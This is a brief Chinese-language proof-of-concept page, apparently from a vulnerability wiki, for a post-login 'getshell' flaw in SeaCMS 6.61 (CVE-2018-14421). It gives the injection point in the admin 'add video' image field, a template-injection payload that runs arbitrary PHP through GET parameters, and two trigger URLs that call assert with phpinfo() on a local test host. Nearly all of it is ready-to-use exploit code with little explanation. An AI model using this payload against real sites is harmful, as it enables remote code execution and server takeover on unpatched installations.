Seacms6.61后台getshell
Affected Version 6.61¶
POC¶
后台的→添加影片→ 图片地址→payload
{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}
访问
http://192.168.0.6/seacms661/detail/?1.html&a=assert&b=phpinfo();
http://192.168.0.6/seacms661/search.php?searchtype=5&tid=0&a=assert&b=phpinfo();
References¶
CVE-2018-14421——Seacms后台getshell分析
最后更新: 2023-10-12